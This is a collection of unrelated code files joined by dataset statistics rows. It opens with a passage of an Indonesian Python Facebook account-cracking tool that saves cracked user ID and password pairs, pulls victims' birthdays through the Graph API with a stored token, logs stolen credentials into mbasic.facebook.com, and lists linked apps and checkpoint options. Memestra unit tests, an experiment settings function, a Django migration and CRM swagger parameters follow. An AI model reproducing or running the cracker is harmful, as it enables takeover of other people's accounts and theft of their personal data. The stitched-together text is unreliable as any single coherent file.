ok.append("%s|%s"%(uid, pw))
open("ok.txt","a").write("%s|%s\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
token = open("___dekura___sayang___ara___", "r").read()
with requests.Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token)).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print("\r\x1b[1;33m [CP] %s • %s • %s %s %s\033[0;97m"%(uid, pw, day, month, year))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
open("checkcp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
print("\r\x1b[1;33m [CP] %s • %s\033[0;97m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s\n"%(uid, pw))
open("checkcp.txt","a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
### Check Crack ###
def hasil():
if len(ok) != 0 or len(cp) != 0:
exit(orbxd.awokawokaowkwoawkwowksheheheiwoansvdejeike_dekura_sayang())
else:
exit("\n\033[0;96m\033[0;97m [\033[;36m•\033[1;37m] Lah? Kok Gak Dapat Hasil :v\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Makanya Gans Biar Dapat Result :v")
### Pilih Result ###
def ress():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] RESULT CRACKER")
print("\033[0;96m"+50*"-")
print("\033[0;96m\033[0;97m [\033[1;36m1\033[1;37m] Cek Result Crack Friends,Public,Likes,Followers")
print("\033[0;96m\033[0;97m [\033[1;36m2\033[1;37m] Cek Result Crack Email")
print("\033[0;96m\033[0;97m [\033[1;36m3\033[1;37m] Cek Result Crack Phone Number")
print("\033[0;96m\033[0;97m [\033[1;36m0\033[1;37m] Back To Menu")
pill = raw_input('\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ')
if pill =="1" or pill =="01":
result_mbasicc()
elif pill =="2" or pill =="02":
result_emailampas()
elif pill =="3" or pill =="03":
result_nomoertogel()
elif pill =="0" or pill =="00":
menu()
else:
print('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah!').format(R, N)
ress()
### Result __All__ ###
def result_mbasicc():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result OK "))
try:
os.system("cat ok.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
print(("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result CP"))
try:
os.system("cat cp.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
n = raw_input("\033[1;37m [BACK]")
menu()
### Result M Facebook ###
def result_emefbi():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Cracker M.Facebook\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m]"))
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result OK "))
try:
os.system("cat mfb/ok.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
print(("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result CP"))
try:
os.system("cat mfb/cp.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
n = raw_input("\033[1;37m [BACK]")
menu()
### Result Touch Facebook ###
def result_touchh():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Cracker Touch.Facebook\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m]"))
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result OK "))
try:
os.system("cat touchfb/ok.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
print(("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result CP"))
try:
os.system("cat touchfb/cp.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
n = raw_input("\033[1;37m [BACK]")
menu()
### Result Api Facebook ###
def result_apei():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Cracker Api.Facebook\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m]"))
print("\033[0;96m"+50*"-")
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result OK "))
try:
os.system("cat apifb/ok.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
print(("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result CP"))
try:
os.system("cat apifb/cp.txt")
except IOError:
print(("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found"))
n = raw_input("\033[1;37m [BACK]")
menu()
### Milih Tok Kok ###
def awokawokaowkwoawkwowksheheheiwoansvdejeike_dekura_sayang():
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Check Option Account Sesi? y/n")
kotntodhsvsvsvsvsv = raw_input('\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ')
if kotntodhsvsvsvsvsv == "y" or kotntodhsvsvsvsvsv == "Y":
option_sesi()
elif kotntodhsvsvsvsvsv == "n" or kotntodhsvsvsvsvsv == "N":
os.remove('checkcp.txt')
menu()
else:
print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Pilihan Cuma y/n Gak Ada Yang Laen Tololl!")
# Check Option Crack Langsung ###
def option_sesi():
    """Re-check every 'user|password' entry stored in checkcp.txt via
    dekura_chann, then delete the file and exit."""
    path = ("checkcp.txt")
    try:
        entries = open(path, "r").readlines()
    except IOError:
        exit("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Files %s%s%s Tidak Ada!" % (h, path, p))
    for raw_line in entries:
        entry = raw_line.replace("\n", "")
        fields = entry.split("|")
        print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Check Account : " + entry.replace(" + ", ""))
        try:
            # fields[0] = username/id, fields[1] = password.
            dekura_chann(fields[0].replace(" + ", ""), fields[1])
        except requests.exceptions.ConnectionError:
            # Best effort: skip accounts that fail due to network issues.
            pass
    os.remove('checkcp.txt')
    exit("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Done Ya Anjing")
def dekura_chann(user, pasw):
    # Try to log `user`/`pasw` into mbasic.facebook.com and report the
    # outcome: linked accounts on success, the checkpoint options if the
    # account is locked, or Facebook's login error text otherwise.
    # NOTE(review): depends on module-level `requests`, `parser`
    # (presumably BeautifulSoup) and `re` defined elsewhere in this file.
    mb = ("https://mbasic.facebook.com")
    # Mobile user-agent so Facebook serves the plain-HTML login form.
    ua = ("Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]")
    ses = requests.Session()
    # Browser-like headers applied to every request in this session.
    ses.headers.update({"Host": "mbasic.facebook.com","cache-control": "max-age=0","upgrade-insecure-requests": "1","origin": mb,"content-type": "application/x-www-form-urlencoded","user-agent": ua,"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with": "mark.via.gp","sec-fetch-site": "same-origin","sec-fetch-mode": "navigate","sec-fetch-user": "?1","sec-fetch-dest": "document","referer": mb+"/login/?next&ref=dbl&fl&refid=8","accept-encoding": "gzip, deflate","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
    data = {}
    # Fetch the login page and locate the POST form.
    ged = parser(ses.get(mb+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
    fm = ged.find("form",{"method":"post"})
    # Hidden form fields the login POST must echo back.
    # NOTE(review): `list` shadows the builtin; kept as-is.
    list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
    for i in fm.find_all("input"):
        if i.get("name") in list:
            data.update({i.get("name"):i.get("value")})
        else:
            continue
    data.update({"email":user,"pass":pasw})
    # Submit the credentials and parse the response page.
    run = parser(ses.post(mb+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
    if "c_user" in ses.cookies:
        # Logged in successfully: rebuild the cookie header and scrape
        # the apps/settings page for accounts linked to this profile.
        kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
        run = parser(ses.get("https://free.facebook.com/settings/apps/tabbed/", cookies={"cookie":kuki}).text, "html.parser")
        # Skip the first two table cells -- presumably headers; TODO confirm.
        xe = [re.findall("\<span.*?href=\".*?\">(.*?)<\/a><\/span>.*?\<div class=\".*?\">(.*?)<\/div>", str(td)) for td in run.find_all("td", {"aria-hidden":"false"})][2:]
        print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Akun Yang Mungkin Terkait Dengan Facebook : %s"%(str(len(xe))))
        num = 0
        for _ in xe:
            num += 1
            print(" "+str(num)+" "+_[0][0]+", "+_[0][1])
    elif "checkpoint" in ses.cookies:
        # Account hit a checkpoint: press "Continue" and list the
        # verification options Facebook offers.
        form = run.find("form")
        dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
        jzst = form.find("input",{"name":"jazoest"})["value"]
        nh = form.find("input",{"name":"nh"})["value"]
        # NOTE(review): the duplicate fb_dtsg/jazoest keys are redundant
        # (the later value wins) but harmless; kept byte-identical.
        dataD = {"fb_dtsg": dtsg,"fb_dtsg": dtsg,"jazoest": jzst,"jazoest": jzst,"checkpoint_data":"","submit[Continue]":"Lanjutkan","nh": nh}
        xnxx = parser(ses.post(mb+form["action"], data=dataD).text, "html.parser")
        ngew = [yy.text for yy in xnxx.find_all("option")]
        print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Total Opsi Yang Tersedia "+str(len(ngew)))
        for opt in range(len(ngew)):
            print(" [\033[1;36m"+str(opt+1)+"\033[1;37m] "+ngew[opt])
    elif "login_error" in str(run):
        # Facebook rejected the credentials -- echo its error text.
        oh = run.find("div",{"id":"login_error"}).find("div").text
        print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] %s"%(oh))
    else:
        print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Eror Login Failed!\n")
### Result Free Facebook ###
def result_freeefbi():
    """Display cracked-account results for the free.facebook module,
    wait for the user, then return to the main menu.

    Bug fixed: ``os.system("cat ...")`` never raises IOError, so the
    original ``except IOError`` fallback was dead code; the result
    files are now checked explicitly.
    """
    os.system('clear')
    print(logo)
    print("\033[0;96m" + 50 * "-")
    print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Cracker Free.Facebook\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m]")
    print("\033[0;96m" + 50 * "-")
    print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result OK ")
    if os.path.isfile("freefb/ok.txt"):
        os.system("cat freefb/ok.txt")
    else:
        print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found")
    print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result CP")
    if os.path.isfile("freefb/cp.txt"):
        os.system("cat freefb/cp.txt")
    else:
        print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found")
    raw_input("\033[1;37m [BACK]")
    menu()
### Result Email ###
def result_emailampas():
    """Display the email cracker results, wait for the user, then
    return to the main menu.

    Bug fixed: ``os.system("cat ...")`` never raises IOError, so the
    original ``except IOError`` fallback was dead code; the result
    file is now checked explicitly.
    """
    os.system('clear')
    print(logo)
    print("\033[0;96m" + 50 * "-")
    print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Cracker Email\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m]")
    print("\033[0;96m" + 50 * "-")
    print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Email ")
    if os.path.isfile("email/hasil.txt"):
        os.system("cat email/hasil.txt")
    else:
        print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found")
    raw_input("\033[1;37m [BACK]")
    menu()
### Result Nomor ###
def result_nomoertogel():
    """Display the phone-number cracker results, wait for the user,
    then return to the main menu.

    Bug fixed: ``os.system("cat ...")`` never raises IOError, so the
    original ``except IOError`` fallback was dead code; the result
    file is now checked explicitly.
    """
    os.system('clear')
    print(logo)
    print("\033[0;96m" + 50 * "-")
    print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Cracker Phone Number\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m]")
    print("\033[0;96m" + 50 * "-")
    print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Result Live/Check ")
    if os.path.isfile("done/indo.txt"):
        os.system("cat done/indo.txt")
    else:
        print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] No Result Found")
    raw_input("\033[1;37m [BACK]")
    menu()
### Update Kontol ###
def up():
    """Tell the user the script is being updated, then terminate."""
    print('\x1b[0;96m\x1b[0;97m [\x1b[1;36m•\x1b[1;37m] Mohon Bersabar User, Script Sedang Di Update!')
    os.sys.exit()
if __name__=="__main__":
    # Entry point: refresh the script from its git remote, remove any
    # leftover session file from a previous run, then show the menu.
    os.system('git pull')
    os.system('rm -rf checkcp.txt')
    menu()
| 71.555118
| 43,318
| 0.669317
| 19,102
| 109,050
| 3.76971
| 0.052193
| 0.013637
| 0.04312
| 0.088392
| 0.87153
| 0.859629
| 0.847158
| 0.838728
| 0.832618
| 0.826647
| 0
| 0.181568
| 0.120202
| 109,050
| 1,523
| 43,319
| 71.602101
| 0.567583
| 0.014415
| 0
| 0.666164
| 0
| 0.462698
| 0.685348
| 0.263913
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.046722
| 0.012811
| null | null | 0.180859
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
981558cf149b1c375e113c9babfee39ebbaf52dc
| 5,688
|
py
|
Python
|
tests/test_basic.py
|
brendan0powers/memestra
|
d68d7f416907fab067a0b7fc3975052b6ec9f182
|
[
"BSD-3-Clause"
] | 21
|
2020-03-10T13:10:17.000Z
|
2021-06-14T17:54:01.000Z
|
tests/test_basic.py
|
brendan0powers/memestra
|
d68d7f416907fab067a0b7fc3975052b6ec9f182
|
[
"BSD-3-Clause"
] | 48
|
2020-03-28T21:35:40.000Z
|
2022-02-14T15:14:47.000Z
|
tests/test_basic.py
|
brendan0powers/memestra
|
d68d7f416907fab067a0b7fc3975052b6ec9f182
|
[
"BSD-3-Clause"
] | 9
|
2020-03-18T12:57:19.000Z
|
2021-11-21T09:40:25.000Z
|
from unittest import TestCase
from textwrap import dedent
from io import StringIO
import memestra
class TestBasic(TestCase):
    """End-to-end checks of memestra on deprecated *functions*.

    Each embedded snippet marks ``foo`` as deprecated through some
    import style and uses it twice; memestra must report both uses as
    (name, file, line, column, message) tuples.

    Fix: the snippets' blank lines and indentation were mangled by text
    extraction; they are reconstructed here so the (line, column) pairs
    asserted in each test actually match the snippet layout.
    """

    def checkDeprecatedUses(self, code, expected_output, decorator=('decoratortest', 'deprecated')):
        # Run memestra over the dedented snippet and compare verbatim.
        sio = StringIO(dedent(code))
        output = memestra.memestra(sio, decorator, None)
        self.assertEqual(output, expected_output)

    def test_import(self):
        code = '''
            import decoratortest

            @decoratortest.deprecated
            def foo(): pass

            def bar():
                foo()

            foo()'''
        self.checkDeprecatedUses(
            code,
            [('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])

    def test_import_alias(self):
        code = '''
            import decoratortest as dec

            @dec.deprecated
            def foo(): pass

            def bar():
                foo()

            foo()'''
        self.checkDeprecatedUses(
            code,
            [('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])

    def test_import_from(self):
        code = '''
            from decoratortest import deprecated

            @deprecated
            def foo(): pass

            def bar():
                foo()

            foo()'''
        self.checkDeprecatedUses(
            code,
            [('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])

    def test_import_from_alias(self):
        code = '''
            from decoratortest import deprecated as dp

            @dp
            def foo(): pass

            def bar():
                foo()

            foo()'''
        self.checkDeprecatedUses(
            code,
            [('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])

    def test_call_from_deprecated(self):
        code = '''
            from decoratortest import deprecated as dp

            @dp
            def foo(): pass

            @dp
            def bar():
                foo()

            foo()'''
        self.checkDeprecatedUses(
            code,
            [('foo', '<>', 9, 4, None), ('foo', '<>', 11, 0, None)])

    def test_import_from_same_module_and_decorator(self):
        code = '''
            from deprecated import deprecated

            @deprecated
            def foo(): pass

            def bar():
                foo()

            foo()'''
        self.checkDeprecatedUses(
            code,
            [('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)],
            ('deprecated', 'deprecated'))
class TestClassBasic(TestCase):
    """End-to-end checks of memestra on deprecated *classes*.

    Same contract as TestBasic but the deprecated symbol is a class.

    Fix: the snippets' blank lines and indentation were mangled by text
    extraction; they are reconstructed here so the (line, column) pairs
    asserted in each test actually match the snippet layout.
    """

    def checkDeprecatedUses(self, code, expected_output):
        # Run memestra over the dedented snippet and compare verbatim.
        sio = StringIO(dedent(code))
        output = memestra.memestra(sio, ('decoratortest', 'deprecated'), None)
        self.assertEqual(output, expected_output)

    def test_import(self):
        code = '''
            import decoratortest

            @decoratortest.deprecated
            class foo: pass

            def bar():
                foo()

            foo()'''
        self.checkDeprecatedUses(
            code,
            [('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])

    def test_import_alias(self):
        code = '''
            import decoratortest as dec

            @dec.deprecated
            class foo: pass

            def bar():
                foo()

            foo()'''
        self.checkDeprecatedUses(
            code,
            [('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])

    def test_import_from(self):
        code = '''
            from decoratortest import deprecated

            @deprecated
            class foo: pass

            def bar():
                foo()

            foo()'''
        self.checkDeprecatedUses(
            code,
            [('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])

    def test_import_from_alias(self):
        code = '''
            from decoratortest import deprecated as dp

            @dp
            class foo(object): pass

            def bar():
                foo()

            foo()'''
        self.checkDeprecatedUses(
            code,
            [('foo', '<>', 8, 4, None), ('foo', '<>', 10, 0, None)])

    def test_instance_from_deprecated(self):
        code = '''
            from decoratortest import deprecated as dp

            @dp
            class foo(object): pass

            @dp
            def bar():
                foo()

            foo()'''
        self.checkDeprecatedUses(
            code,
            [('foo', '<>', 9, 4, None), ('foo', '<>', 11, 0, None)])

    def test_use_in_inheritance(self):
        code = '''
            from decoratortest import deprecated as dp

            @dp
            class foo(object): pass

            class bar(foo): pass
            '''
        self.checkDeprecatedUses(
            code,
            [('foo', '<>', 7, 10, None)])

    def test_instance_from_deprecated_class(self):
        code = '''
            from decoratortest import deprecated as dp

            @dp
            class foo(object): pass

            @dp
            class bar(object):
                foo()

            foo()'''
        self.checkDeprecatedUses(
            code,
            [('foo', '<>', 9, 4, None), ('foo', '<>', 11, 0, None)])

    def test_decorator_with_param(self):
        code = '''
            from decoratortest import deprecated as dp

            @dp()
            class foo(object): pass

            @dp("ignored")
            def bar(x):
                foo()

            bar(foo)'''
        self.checkDeprecatedUses(
            code,
            [('bar', '<>', 11, 0, 'ignored'),
             ('foo', '<>', 9, 4, None),
             ('foo', '<>', 11, 4, None)])
| 22.661355
| 100
| 0.445323
| 511
| 5,688
| 4.874755
| 0.101761
| 0.051385
| 0.151746
| 0.156564
| 0.832196
| 0.832196
| 0.806102
| 0.764352
| 0.727419
| 0.727419
| 0
| 0.021277
| 0.413326
| 5,688
| 250
| 101
| 22.752
| 0.725202
| 0
| 0
| 0.827586
| 0
| 0
| 0.462553
| 0.00879
| 0
| 0
| 0
| 0
| 0.011494
| 1
| 0.091954
| false
| 0.086207
| 0.155172
| 0
| 0.258621
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
981a79c8e63851a61c265a8b603f97eea31d45e4
| 1,853
|
py
|
Python
|
Settings/set1-test_of_models_against_datasets/img299.py
|
previtus/MGR-Project-Code
|
1126215059eb3f731dcf78ec24d9a480e73abce6
|
[
"MIT"
] | null | null | null |
Settings/set1-test_of_models_against_datasets/img299.py
|
previtus/MGR-Project-Code
|
1126215059eb3f731dcf78ec24d9a480e73abce6
|
[
"MIT"
] | null | null | null |
Settings/set1-test_of_models_against_datasets/img299.py
|
previtus/MGR-Project-Code
|
1126215059eb3f731dcf78ec24d9a480e73abce6
|
[
"MIT"
] | null | null | null |
def Setup(Settings, DefaultModel):
    """Configure the set1 image-model-versus-datasets experiment (299 px).

    Mutates and returns *Settings*.  Model slot 0 must already exist;
    two further slots are appended as copies of *DefaultModel*.  The
    three slots differ only in dataset name and unique id, so the
    shared settings are factored into a helper.
    """
    # set1-test_of_models_against_datasets/osm299.py
    Settings["experiment_name"] = "set1_Img_model_versus_datasets_299px"
    Settings["graph_histories"] = ['together']  # ['all','together',[],[1,0],[0,0,0],[]]

    # 5556x_minlen30_640px 5556x_minlen20_640px 5556x_reslen20_299px 5556x_reslen30_299px
    def _configure(n, dataset_name, unique_id):
        # Settings shared by every model in this experiment.
        model = Settings["models"][n]
        model["dataset_name"] = dataset_name
        model["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
        model["pixels"] = 299
        model["model_type"] = 'simple_cnn_with_top'
        model["unique_id"] = unique_id
        model["top_repeat_FC_block"] = 2
        model["epochs"] = 800

    _configure(0, "5556x_reslen30_299px", 'img_minlen30_299px')

    Settings["models"].append(DefaultModel.copy())
    Settings["models"][1]["dataset_pointer"] = -1
    _configure(1, "5556x_reslen20_299px", 'img_minlen20_299px')

    Settings["models"].append(DefaultModel.copy())
    Settings["models"][2]["dataset_pointer"] = -1
    _configure(2, "5556x_mark_res_299x299", 'img_nosplit_299px')

    return Settings
| 44.119048
| 89
| 0.683756
| 237
| 1,853
| 5.025316
| 0.261603
| 0.293871
| 0.289673
| 0.092359
| 0.742233
| 0.742233
| 0.716205
| 0.716205
| 0.716205
| 0.716205
| 0
| 0.078915
| 0.124663
| 1,853
| 41
| 90
| 45.195122
| 0.655364
| 0.090664
| 0
| 0.65625
| 0
| 0
| 0.462225
| 0.100535
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2c5430e5dd6e17d82b3e84bbf30491bf4d92ef91
| 2,195
|
py
|
Python
|
src/basic/migrations/0024_auto_20191212_1827.py
|
parezj/PartsView
|
a59a3804b574b11efd8f0472deae4dae1c16eb67
|
[
"WTFPL"
] | 3
|
2020-05-10T08:40:36.000Z
|
2020-10-28T18:09:31.000Z
|
src/basic/migrations/0024_auto_20191212_1827.py
|
parezj/PartsView
|
a59a3804b574b11efd8f0472deae4dae1c16eb67
|
[
"WTFPL"
] | 1
|
2019-12-17T23:41:17.000Z
|
2019-12-17T23:42:43.000Z
|
src/basic/migrations/0024_auto_20191212_1827.py
|
parezj/PartsView
|
a59a3804b574b11efd8f0472deae4dae1c16eb67
|
[
"WTFPL"
] | 1
|
2021-06-11T10:49:10.000Z
|
2021-06-11T10:49:10.000Z
|
# Generated by Django 2.2.8 on 2019-12-12 17:27
from django.db import migrations, models
class Migration(migrations.Migration):
    """Set max_length=50 on the six price/manufacturer char columns of
    both the favourite-part and history-part tables."""

    dependencies = [
        ('basic', '0023_auto_20191212_1820'),
    ]

    # The same six columns receive the identical alteration on both
    # models, so the operation list is generated rather than written
    # out twelve times.  Order matches the original: all favouritepart
    # fields first, then all historypart fields.
    operations = [
        migrations.AlterField(
            model_name=model,
            name=column,
            field=models.CharField(max_length=50),
        )
        for model in ('favouritepart', 'historypart')
        for column in ('digikey_mnu', 'digikey_usd', 'farnell_czk',
                       'farnell_mnu', 'mouser_eur', 'mouser_mnu')
    ]
| 29.662162
| 50
| 0.553531
| 197
| 2,195
| 5.969543
| 0.208122
| 0.204082
| 0.255102
| 0.295918
| 0.87415
| 0.87415
| 0.87415
| 0.838435
| 0.838435
| 0.809524
| 0
| 0.037749
| 0.336219
| 2,195
| 73
| 51
| 30.068493
| 0.769389
| 0.020501
| 0
| 0.895522
| 1
| 0
| 0.139665
| 0.010708
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014925
| 0
| 0.059701
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
2c5670166e0cd0a581dc3141d07a58067267d893
| 73
|
py
|
Python
|
apps/tts_tests/models/__init__.py
|
michaldomino/Voice-interface-optimization-server
|
fff59d4c5db599e35d4b5f3915bbb272d2000a26
|
[
"MIT"
] | null | null | null |
apps/tts_tests/models/__init__.py
|
michaldomino/Voice-interface-optimization-server
|
fff59d4c5db599e35d4b5f3915bbb272d2000a26
|
[
"MIT"
] | null | null | null |
apps/tts_tests/models/__init__.py
|
michaldomino/Voice-interface-optimization-server
|
fff59d4c5db599e35d4b5f3915bbb272d2000a26
|
[
"MIT"
] | null | null | null |
from .tts_test import TtsTest
from .tts_test_result import TtsTestResult
| 24.333333
| 42
| 0.863014
| 11
| 73
| 5.454545
| 0.636364
| 0.233333
| 0.366667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 73
| 2
| 43
| 36.5
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2c834cc89b51505c372001825927e48cd5db8b8f
| 3,214
|
py
|
Python
|
leads/swagger_params.py
|
sauravpanda/Django-CRM
|
c6b8cde02c9cf3d3f30f4e05b825f77d00734e87
|
[
"MIT"
] | null | null | null |
leads/swagger_params.py
|
sauravpanda/Django-CRM
|
c6b8cde02c9cf3d3f30f4e05b825f77d00734e87
|
[
"MIT"
] | null | null | null |
leads/swagger_params.py
|
sauravpanda/Django-CRM
|
c6b8cde02c9cf3d3f30f4e05b825f77d00734e87
|
[
"MIT"
] | null | null | null |
from drf_yasg import openapi
company_params_in_header = openapi.Parameter(
    "company", openapi.IN_HEADER, required=True, type=openapi.TYPE_STRING
)


def _string_query(name, **extra):
    """Internal shorthand for a string query parameter."""
    return openapi.Parameter(name, openapi.IN_QUERY, type=openapi.TYPE_STRING, **extra)


def _file_query(name):
    """Internal shorthand for a file-upload query parameter."""
    return openapi.Parameter(name, openapi.IN_QUERY, type=openapi.TYPE_FILE)


# Filters accepted when listing leads.
lead_list_get_params = [company_params_in_header] + [
    _string_query(n) for n in ("title", "source", "assigned_to", "status", "tags")
]

# Parameters accepted on the lead detail endpoint.
lead_detail_get_params = [
    company_params_in_header,
    _file_query("lead_attachment"),
    _string_query("comment"),
]

lead_delete_params = [
    company_params_in_header,
]

# Fields accepted when creating a lead; only "title" is required.
lead_create_post_params = (
    [company_params_in_header, _string_query("title", required=True)]
    + [_string_query(n) for n in ("first_name", "last_name", "account_name", "phone", "email")]
    + [_file_query("lead_attachment")]
    + [
        _string_query(n)
        for n in (
            "website", "description", "teams", "assigned_to", "status", "source",
            "address_line", "street", "city", "state", "postcode", "country", "tags",
        )
    ]
)

# Bulk lead import takes a single file upload.
lead_upload_post_params = [
    company_params_in_header,
    _file_query("leads_file"),
]

lead_comment_edit_params = [
    company_params_in_header,
    _string_query("comment"),
]
| 27.470085
| 74
| 0.672993
| 369
| 3,214
| 5.569106
| 0.135501
| 0.233577
| 0.218978
| 0.245255
| 0.906569
| 0.891484
| 0.833577
| 0.80438
| 0.761557
| 0.545985
| 0
| 0
| 0.214686
| 3,214
| 116
| 75
| 27.706897
| 0.814184
| 0
| 0
| 0.697248
| 0
| 0
